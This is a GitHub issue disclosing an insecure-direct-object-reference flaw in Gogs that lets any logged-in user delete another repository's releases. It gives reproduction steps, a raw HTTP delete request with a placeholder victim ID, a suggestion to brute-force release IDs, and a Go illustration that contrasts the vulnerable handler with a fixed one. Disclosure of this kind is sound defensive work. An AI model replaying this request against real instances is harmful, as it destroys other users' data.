
[Vulnerability] Ability to delete arbitrary repository's releases #3962

@jimen0

As my previous report, sent to the email address you specified for vulnerability reports, was ignored for more than a month, I see the need to report the following vulnerability through this method. Please excuse me if this causes you any inconvenience.

Description

Ability to delete arbitrary repository's releases

I found that I am able to delete arbitrary releases from any Gogs instance on which I have a registered account.

To reproduce this vulnerability, please follow these steps:

  1. Create an account for the attacker; let's call this account gogsreporteA.
  2. Create an account for the victim; let's call this account gogsreporteB.
  3. Activate them both.
  4. Log in as userA and create a repository with any values you want. Then create a release for it.
  5. Log in as userB and create a repository (private or not, it's your choice) with any values you want. Then create a release for it.
  6. Now, once it has been created, turn on any HTTP traffic proxy with the ability to intercept traffic (Burp Suite was my choice).
  7. Enable the proxy and then delete the release you created in step 3 (gogsreporteA's release).
  8. Now the request will look like the one shown below.
  9. Modify the id parameter and put in the release ID of our victim (gogsreporteB). But you do not know it, right? Since it is a numeric ID, we could brute-force it (Burp's Intruder or a simple Python script). Let's assume we know it.
  10. Put that ID in the request and forward it.
  11. gogsreporteB's release was removed.
  12. Profit (?)
```http
POST /gogsreporteA/usedtohackotheruser/releases/delete HTTP/1.1
Host: try.gogs.io
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Cookie: lang=en-US; i_like_gogits=8ea2647e8d8e44fa; _csrf=8zS9PCrDiSOtu13AOdo1jQPujE06MTQ4MTg0NDM2MzgyMzI5ODUwMw%3D%3D
DNT: 1
Connection: close

_csrf=8zS9PCrDiSOtu13AOdo1jQPujE06MTQ4MTg0NDM2MzgyMzI5ODUwMw%3D%3D&id=[VICTIM-REPO-RELEASE-ID-HERE]
```

Kind regards,
Miguel Ángel Jimeno
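The bug class in the report above is an insecure direct object reference: the write-permission check happens on the repository named in the URL, but the release to delete is chosen by the `id` form field alone, so nothing ties that id to that repository. The Go program below is an added illustration, not Gogs' code; the `Store`, `Release`, `Replay` and the two delete functions are hypothetical stand-ins for the real handler and database layer. It replays the report's two-account scenario against a handler that deletes by id only and against one that also checks the release belongs to the repository from the URL.

```go
package main

import (
	"errors"
	"fmt"
)

// ErrNotFound is returned both when the release does not exist and when it
// belongs to another repository, so the response does not reveal which.
var ErrNotFound = errors.New("release not found")

// Release holds only the fields the ownership check needs (hypothetical model).
type Release struct {
	ID     int64
	RepoID int64
	Tag    string
}

// Store is an in-memory stand-in for the releases table (hypothetical).
type Store struct {
	releases map[int64]*Release
}

func NewStore() *Store {
	return &Store{releases: make(map[int64]*Release)}
}

func (s *Store) Add(r *Release) { s.releases[r.ID] = r }

// Alive reports whether a release with the given id still exists.
func (s *Store) Alive(id int64) bool {
	_, ok := s.releases[id]
	return ok
}

// DeleteReleaseVulnerable behaves like the handler the report describes:
// repoID is the repository resolved from the URL (where the caller's write
// permission was checked), but the release is found and removed by the form
// field id alone, so any id deletes any repository's release.
func DeleteReleaseVulnerable(s *Store, repoID, id int64) error {
	_ = repoID // never compared against the release
	if !s.Alive(id) {
		return ErrNotFound
	}
	delete(s.releases, id)
	return nil
}

// DeleteReleaseFixed binds the release to the repository from the URL before
// deleting; a release from another repository is treated as not found.
func DeleteReleaseFixed(s *Store, repoID, id int64) error {
	r, ok := s.releases[id]
	if !ok || r.RepoID != repoID {
		return ErrNotFound
	}
	delete(s.releases, id)
	return nil
}

// Replay sets up the two accounts from the report with one release each and
// lets the attacker post the victim's release id through the attacker's own
// repository URL. It returns whether the victim's release survived.
func Replay(del func(*Store, int64, int64) error) (victimSurvived bool, err error) {
	const attackerRepo, victimRepo int64 = 1, 2      // constructed repo ids
	const attackerRelease, victimRelease int64 = 10, 11 // constructed release ids
	s := NewStore()
	s.Add(&Release{ID: attackerRelease, RepoID: attackerRepo, Tag: "v1.0"})
	s.Add(&Release{ID: victimRelease, RepoID: victimRepo, Tag: "v1.0"})
	// Equivalent of POST /attacker/repo/releases/delete with id=<victim id>.
	err = del(s, attackerRepo, victimRelease)
	return s.Alive(victimRelease), err
}

func main() {
	for name, del := range map[string]func(*Store, int64, int64) error{
		"vulnerable": DeleteReleaseVulnerable,
		"fixed":      DeleteReleaseFixed,
	} {
		alive, err := Replay(del)
		fmt.Printf("%-10s victim release survived=%v err=%v\n", name, alive, err)
	}
}
```

Because release ids are small sequential integers, the "you do not know it" step is not a real barrier; the fix has to be the server-side binding of id to repository shown in `DeleteReleaseFixed`, and returning the same not-found result for both cases keeps an attacker from enumerating which ids exist in other repositories.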

Labels: 💊 bug (Something isn't working), 🔒 security (Categorizes as related to security)